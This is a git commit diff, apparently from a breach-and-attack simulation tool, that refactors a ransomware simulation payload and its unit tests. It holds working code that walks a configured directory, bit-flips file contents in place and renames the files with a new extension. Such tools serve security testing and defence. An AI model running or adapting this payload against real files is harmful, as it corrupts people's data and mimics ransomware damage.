agent: Narrow the responsibilities of RansomwareBitflipEncryptor

This commit is contained in:
Mike Salvatore 2021-06-23 10:50:14 -04:00
parent 2ea5dc6ac7
commit 97cf198965
3 changed files with 44 additions and 67 deletions

View File

@ -1,31 +1,13 @@
from pathlib import Path from pathlib import Path
from typing import List, Optional, Tuple
from infection_monkey.utils import bit_manipulators from infection_monkey.utils import bit_manipulators
class RansomwareBitflipEncryptor: class RansomwareBitflipEncryptor:
def __init__(self, new_file_extension, chunk_size=64): def __init__(self, chunk_size=64):
self._new_file_extension = new_file_extension
self._chunk_size = chunk_size self._chunk_size = chunk_size
def _add_extension(self, filepath: Path): def encrypt_file_in_place(self, filepath: Path):
new_filepath = filepath.with_suffix(f"{filepath.suffix}{self._new_file_extension}")
filepath.rename(new_filepath)
def encrypt_files(self, file_list: List[Path]) -> List[Tuple[Path, Optional[Exception]]]:
results = []
for filepath in file_list:
try:
self._encrypt_single_file_in_place(filepath)
self._add_extension(filepath)
results.append((filepath, None))
except Exception as ex:
results.append((filepath, ex))
return results
def _encrypt_single_file_in_place(self, filepath: Path):
with open(filepath, "rb+") as f: with open(filepath, "rb+") as f:
data = f.read(self._chunk_size) data = f.read(self._chunk_size)
while data: while data:

View File

@ -1,5 +1,6 @@
import logging import logging
from pathlib import Path from pathlib import Path
from typing import List, Optional, Tuple
from infection_monkey.ransomware.ransomware_bitflip_encryptor import RansomwareBitflipEncryptor from infection_monkey.ransomware.ransomware_bitflip_encryptor import RansomwareBitflipEncryptor
from infection_monkey.ransomware.valid_file_extensions import VALID_FILE_EXTENSIONS_FOR_ENCRYPTION from infection_monkey.ransomware.valid_file_extensions import VALID_FILE_EXTENSIONS_FOR_ENCRYPTION
@ -24,13 +25,16 @@ class RansomewarePayload:
LOG.info(f"Linux dir configured for encryption is \"{config['linux_dir']}\"") LOG.info(f"Linux dir configured for encryption is \"{config['linux_dir']}\"")
self._target_dir = config["windows_dir"] if is_windows_os() else config["linux_dir"] self._target_dir = config["windows_dir"] if is_windows_os() else config["linux_dir"]
self._new_file_extension = EXTENSION
self._valid_file_extensions_for_encryption = VALID_FILE_EXTENSIONS_FOR_ENCRYPTION.copy() self._valid_file_extensions_for_encryption = VALID_FILE_EXTENSIONS_FOR_ENCRYPTION.copy()
self._valid_file_extensions_for_encryption.discard(EXTENSION) self._valid_file_extensions_for_encryption.discard(self._new_file_extension)
self._encryptor = RansomwareBitflipEncryptor(EXTENSION, chunk_size=CHUNK_SIZE)
self._encryptor = RansomwareBitflipEncryptor(chunk_size=CHUNK_SIZE)
def run_payload(self): def run_payload(self):
file_list = self._find_files() file_list = self._find_files()
self._encryptor.encrypt_files(file_list) self._encrypt_files(file_list)
def _find_files(self): def _find_files(self):
if not self._target_dir: if not self._target_dir:
@ -44,3 +48,19 @@ class RansomewarePayload:
all_files = get_all_regular_files_in_directory(Path(self._target_dir)) all_files = get_all_regular_files_in_directory(Path(self._target_dir))
return filter_files(all_files, file_filters) return filter_files(all_files, file_filters)
def _encrypt_files(self, file_list: List[Path]) -> List[Tuple[Path, Optional[Exception]]]:
results = []
for filepath in file_list:
try:
self._encryptor.encrypt_file_in_place(filepath)
self._add_extension(filepath)
results.append((filepath, None))
except Exception as ex:
results.append((filepath, ex))
return results
def _add_extension(self, filepath: Path):
new_filepath = filepath.with_suffix(f"{filepath.suffix}{self._new_file_extension}")
filepath.rename(new_filepath)

View File

@ -1,7 +1,6 @@
import os
from tests.unit_tests.infection_monkey.ransomware.ransomware_target_files import ( from tests.unit_tests.infection_monkey.ransomware.ransomware_target_files import (
ALL_ZEROS_PDF,
ALL_ZEROS_PDF_CLEARTEXT_SHA256,
ALL_ZEROS_PDF_ENCRYPTED_SHA256,
TEST_KEYBOARD_TXT, TEST_KEYBOARD_TXT,
TEST_KEYBOARD_TXT_CLEARTEXT_SHA256, TEST_KEYBOARD_TXT_CLEARTEXT_SHA256,
TEST_KEYBOARD_TXT_ENCRYPTED_SHA256, TEST_KEYBOARD_TXT_ENCRYPTED_SHA256,
@ -10,50 +9,26 @@ from tests.utils import hash_file
from infection_monkey.ransomware.ransomware_bitflip_encryptor import RansomwareBitflipEncryptor from infection_monkey.ransomware.ransomware_bitflip_encryptor import RansomwareBitflipEncryptor
EXTENSION = ".new"
def test_file_encrypted(ransomware_target):
test_keyboard = ransomware_target / TEST_KEYBOARD_TXT
assert hash_file(test_keyboard) == TEST_KEYBOARD_TXT_CLEARTEXT_SHA256
encryptor = RansomwareBitflipEncryptor(chunk_size=64)
encryptor.encrypt_file_in_place(test_keyboard)
assert hash_file(test_keyboard) == TEST_KEYBOARD_TXT_ENCRYPTED_SHA256
def with_extension(filename): def test_file_encrypted_in_place(ransomware_target):
return f"{filename}{EXTENSION}" test_keyboard = ransomware_target / TEST_KEYBOARD_TXT
expected_inode = os.stat(test_keyboard).st_ino
def test_listed_files_encrypted(ransomware_target): encryptor = RansomwareBitflipEncryptor(chunk_size=64)
orig_all_zeros = ransomware_target / ALL_ZEROS_PDF encryptor.encrypt_file_in_place(test_keyboard)
orig_test_keyboard = ransomware_target / TEST_KEYBOARD_TXT
file_list = [orig_all_zeros, orig_test_keyboard]
assert hash_file(file_list[0]) == ALL_ZEROS_PDF_CLEARTEXT_SHA256 actual_inode = os.stat(test_keyboard).st_ino
assert hash_file(file_list[1]) == TEST_KEYBOARD_TXT_CLEARTEXT_SHA256
encryptor = RansomwareBitflipEncryptor(EXTENSION) assert expected_inode == actual_inode
encryptor.encrypt_files(file_list)
assert hash_file(with_extension(orig_all_zeros)) == ALL_ZEROS_PDF_ENCRYPTED_SHA256
assert hash_file(with_extension(orig_test_keyboard)) == TEST_KEYBOARD_TXT_ENCRYPTED_SHA256
def test_encrypted_files_in_results(ransomware_target):
orig_all_zeros = ransomware_target / ALL_ZEROS_PDF
orig_test_keyboard = ransomware_target / TEST_KEYBOARD_TXT
file_list = [orig_all_zeros, orig_test_keyboard]
encryptor = RansomwareBitflipEncryptor(EXTENSION)
results = encryptor.encrypt_files(file_list)
assert len(results) == 2
assert (orig_all_zeros, None) in results
assert (orig_test_keyboard, None) in results
def test_file_not_found(ransomware_target):
all_zeros = ransomware_target / ALL_ZEROS_PDF
file_list = [all_zeros]
all_zeros.unlink()
encryptor = RansomwareBitflipEncryptor(EXTENSION)
results = encryptor.encrypt_files(file_list)
assert len(results) == 1
assert "No such file or directory" in str(results[0][1])